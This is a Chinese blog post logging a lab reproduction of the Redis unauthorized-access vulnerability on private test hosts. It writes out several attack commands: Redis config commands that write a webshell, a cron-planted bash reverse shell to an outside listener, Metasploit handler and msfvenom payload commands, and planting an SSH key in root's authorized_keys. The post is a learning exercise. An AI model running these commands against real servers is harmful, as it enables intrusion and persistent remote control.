Redis未授权访问漏洞复现过程

最新推荐文章于 2025-09-12 15:23:41 发布
原创 最新推荐文章于 2025-09-12 15:23:41 发布 · 1.1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #数据库 #缓存

CentOS安装redis

从官网https://redis.io/download/下载安装包

上传到/home/strix目录下

解压

tar -zxvf redis-7.2.3.tar.gz -C /usr/local

修改配置文件

vim redis.conf

daemonize no

改成

daemonize yes

下面一行必须改成 bind 0.0.0.0 或注释,否则只能在本机访问

bind 127.0.0.1

如果需要密码访问,取消requirepass的注释,在外网(比如阿里云)这个必须要配置!

requirepass yourpassword

编译

yum install gcc-c++ -y

make && make install

启动redis服务

redis-server redis.conf > redis.log 2>&1 &

netstat -an | grep 6379

设置别名

vim ~/.bashrc

alias redis='/usr/local/redis-7.2.3/src/redis-server /usr/local/redis-7.2.3/redis.conf'

alias rcli='/usr/local/redis-7.2.3/src/redis-cli'

source ~/.bashrc

使用redis启动服务

创建2个服务器

Redis server 192.168.23.135

Redis cli 192.168.23.136

关闭防火墙Close firewall

systemctl stop firewalld.service

systemctl disable firewalld.service

安装小皮面板

Centos安装脚本 yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

安装成功后

请用浏览器访问面板:

外网:http://119.3.119.253:9080/5EF6EA

内网:http://192.168.23.135:9080/5EF6EA

系统初始账号:admin

系统初始密码:ml8mqKulcl

官网:https://www.xp.cn

如果使用的是云服务器,请至安全组开放9080端口

如果使用ftp,请开放21以及30000-30050端口

您修改了面板程序,这是不允许的。

请进入服务器命令行输入xp查看修复方法

动态修改配置

config set:动态修改配置,重启以后失效

config set dir /www/admin/localhost_80/wwwroot

config set dbfilename redis.php

/usr/local/redis-7.2.3/src/redis-cli -h 192.168.23.135 -p 6379

Could not connect to Redis at 192.168.23.135:6379: Connection timed out

not connected> ping 192.168.23.135

firewall closed Could not connect to Redis

改redis版本

因192.168.23.136始终无法连接到192.168.23.135,修改配置后也不行,最终放弃,不知道哪里配置出了问题。2023年11月19号周日花了2个小时也没解决。就决定安装无涯老师装的版本,现在的环境先保留,等复现以后再来查看具体原因。

重新安装Redis

在192.168.23.139/上重新安装redis

cd /usr/local/soft/

wget https://download.redis.io/releases/redis-6.0.9.tar.gz

https://download.redis.io/releases/redis-6.0.9.tar.gz

yum -y install centos-release-scl

yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++ devtoolset-9-binutils

scl enable devtoolset-9 bash

echo "source /opt/rh/devtoolset-9/enable" >>/etc/profile

protected-mode 没改我以为是注释掉的,改不改没关系。

建立反弹连接过程

关闭防火墙

systemctl stop firewalld.service

systemctl disable firewalld.service

/usr/local/soft/redis-6.0.9/src/redis-cli -h 192.168.23.143 -p 6379

vim /usr/local/soft/redis-6.0.9/redis.conf

http://192.168.23.143/redis.php

一句话木马

成功使用一句话木马建立反弹连接

命令含义

标准输入 (stdin) :代码为 0 ,使用 < 或

标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

例:

netstat -an|grep 3306 >out.txt // 输出到文件

find / -name "test.py" 2>/dev/null // 过滤报错

0

bash 反弹连接

客户端

nc

readlink -f $(which nc)

一开始并未成功,对防火墙进行如下配置后成功建立反弹连接

firewall-cmd --zone=public --add-port=7777/tcp –permanent

systemctl status firewalld

systemctl start firewalld

firewall-cmd --zone=public --add-port=7777/tcp --permanent

firewall-cmd --reload

systemctl stop firewalld

msf

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.133

set lport 7777

run

使用如下命令生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.133 lport=7777 -i 5 -f exe -o test.exe

socat

socat TCP-LISTEN:7777 -192.168.23.133

使用定时任务

corn表达式

在线Cron表达式生成器

set x "\n* * * * * bash -i >& /dev/tcp/192.168.23.154/7777 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

SSH key免密登录

set xxx "\n\n \n\n\n"

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC06QxL3nhJE+EouZTp7YI3abMmVgEufaJhBRIxSqFSNjZI6AfuutZmriHaXFIckPYiO2w5jr8dZFR2Z/pDRRCD02RIntrTixXS8kkfRqLK5mFA1vZ7ACHzFe9H5gvg+ElztdgDkhpH3oc1cF2+6/XHiRXwuGCeNzVHZWCaMVDfZT+8qYSrV4TEVWioFFMak/6AQQPfeLyv+bTBnXfKqszSTIqoqVVpQ85f/1ZPv+uVZJO78ukWtmSJrlxjsZc1ndQy7Brd5zSYpJe1/jFnUnCJws9guZ9u2Oo644FydDs0NvV6lS0S2soBr5OxsXfrXh8V9Zb6jy5EYqofXu3+yyBx root@localhost.localdomain

set xxx "\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC06QxL3nhJE+EouZTp7YI3abMmVgEufaJhBRIxSqFSNjZI6AfuutZmriHaXFIckPYiO2w5jr8dZFR2Z/pDRRCD02RIntrTixXS8kkfRqLK5mFA1vZ7ACHzFe9H5gvg+ElztdgDkhpH3oc1cF2+6/XHiRXwuGCeNzVHZWCaMVDfZT+8qYSrV4TEVWioFFMak/6AQQPfeLyv+bTBnXfKqszSTIqoqVVpQ85f/1ZPv+uVZJO78ukWtmSJrlxjsZc1ndQy7Brd5zSYpJe1/jFnUnCJws9guZ9u2Oo644FydDs0NvV6lS0S2soBr5OxsXfrXh8V9Zb6jy5EYqofXu3+yyBx root@localhost.localdomain\n\n\n"

config set dbfilename authorized_keys

save

config set dir /root/.ssh

ssh -i ./id_rsa root@192.168.23.143

ssh -i ./id_rsa root@192.168.23.143

加固

https://redis.io/docs/management/security/

Redis is designed to be accessed by trusted clients inside trusted environments. This means that usually it is not a good idea to expose the Redis instance directly to the internet or, in general, to an environment where untrusted clients can directly access the Redis TCP port or UNIX socket.

观浩
关注
Redis连接报错RedisCommandExecutionException: WRONGPASS invalid username-password pair
邓邓子的博客
04-27 1万+
目录一、问题描述二、解决方法 一、问题描述 在 application.yml 中配置 Redis 连接信息如下: # Redis redis: host: 192.168.1.38 port: 6379 password: ‘!abc123456’ 编译时报错 RedisCommandExecutionException: WRONGPASS invalid username-password pair: Caused by: io.lettuce.core.Redis
WRONGPASS invalid username-password pair or user is disabled
猿小白的博客
06-22 6963
连接redis客户端的时候报错:WRONGPASS invalid username-password pair or user is disabled当前redis版本为7.2.4
vulhub漏洞复现-redis未授权访问getshell总结 (CVE-2022-0543)
最新发布
2302_79841575的博客
09-12 795
摘要:本文演示了Redis未授权访问漏洞的利用过程漏洞影响版本低于6.x,主要由于未配置访问控制和密码认证所致。攻击者通过nmap扫描发现靶机开放6379端口后,使用redis-rogue-getshell工具建立主从复制连接,成功在目标系统执行命令。复现过程包括环境搭建、未授权连接验证和利用主从复制模式实现远程代码执行,展示了该高危漏洞的实际危害。
漏洞复现Redis未授权访问
m0_56190544的博客
09-13 3074
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
redis未授权漏洞复现
weixin_64972949的博客
05-08 1018
Redis,英文全称是Remote Dictionary Server(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。与MySQL数据库不同的是,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存,另外,Redis也经常用来做分布式锁。除此之外,Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。
Redis未授权访问漏洞复现及利用
Lilin's博客
03-20 1185
Redis未授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis未授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
redis未授权访问漏洞复现
zkaqlaoniao的博客
06-27 907
攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis未授权访问漏洞复现
weixin_55123346的博客
06-26 1651
Redis漏洞复现
redis漏洞修复:(CNVD-2019-21763)
大新新大浩浩的博客
09-22 1447
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
Redis未授权访问
m0_67393342的博客
08-24 2276
漏洞复现过程磕磕绊绊,但还是坚持了下来,并且收获甚大。中正如学习之路一样,即使再艰难也要坚持学习,解决问题的方法不止一个,此法不行另寻他法。
解决 Redis7.0远程连接及客户端连接报错:WRONGPASS invalid username-password pair or user is disabled.
bk_陈龙伟
03-17 1万+
解决 Redis7.0远程连接及客户端连接报错:WRONGPASS invalid username-password pair or user is disabled.
CRMEB知识付费系统安装搭建【常见问题-13.redis密码】
CRMEB小程序商城的博客
06-18 4617
redis密码没有设置 如图: 目录切换到知识付费项目根目录,点击终端 打开终端后切到知识付费根目录 第一步:检查redis是否启动 命令:redis-cli 第二步:检查redis密码 命令:keys * 第三步:密码 这是没有设置redis密码,项目中也可不用设置密码 第四步:设置redis密码 如 将redis密码设置成1234567 命令:config set requirepass 1234567 第五步:检查密码是否设置成功 第六步:项目配置文件设置redis密码 更改成redis
解决 Redis7.0远程连接报错:WRONGPASS invalid username-password pair or user is disabled.
SSSSSSSWWA的博客
05-09 1万+
再设置bind 0.0.0.0 和protected-mode no以及密码之后,我通过本地工具远程连接服务器的redis始终连接不上,并且能够确认服务器上的redis是正常运行,本地也能telnt通服务器的6379端口,翻遍很多资料后发现:redis7.0升级了一个东西:当设置密码后,用户名不再是root,会有一个默认的用户名:default,把用户名改成default 成功解决问题。
redis保护模式的报错
sudsahdua的博客
10-18 823
1.首先得保证redis实在gcc环境下运行的 2.如果发现命令行中只能打印出大写在符号,那么长安【A】就好,或者shift+[A]试试 3.mini安装Linux发现连不了网,要在配置文件中启动网关,并且设置自动分配IP地址,如果手动配置IP地址的话开门,可能还是连不上 4.java连接Redis出现错误, --------(错误原因:1>Linux防火墙默认是开启的 2>Redis默认是保护模式(绑定到127.0.0.1)) 解决方法: 关闭防火墙同时关闭Redis的保护模式 按照java的
Spring Boot中连接Redis的yml WRONGPASS invalid username-password pair or user is disabled.
热门推荐
Ying_Lan的博客
10-01 2万+
Spring Boot通过yml文件连接Redis失败
解决RedisException thrown with message “WRONGPASS invalid username-password pair or user is disabled.
weixin_45686265的博客
12-19 2万+
解决RedisException thrown with message "WRONGPASS invalid username-password pair or user is disabled."
解决SpringBoot项目中Redis配置用户名密码连接不上
小白找大神啊的博客
11-06 2847
解决WRONGPASS invalid username-password pair or user is disabled问题
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 3025
Redis未授权访问漏洞利用方式总结(含靶场搭建)
Redis6 Cluster,Unable to AUTH to MASTER: -WRONGPASS invalid username-password pair or user is disabl
qq_34884729的博客
06-20 1793
Redis6 的acl,默认会有个default账号,就算填不填masteruser这个参数也不会影响,但是,填了masteruser这个参数,主从复制的时候,从节点就会用masteruser这个账号来auth,那就导致cluster的主从复制异常的根本原因!配置就不铺了,网上一堆。导致这个问题的原因,其实到头来还是要怪自己,之前我一直用着哨兵模式,里面有个masteruser的参数,纵观整个redis cluster的部署,其实压根用不着这个参数,它不像哨兵,需要这个参数。我这个问题估计相对奇葩一点。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值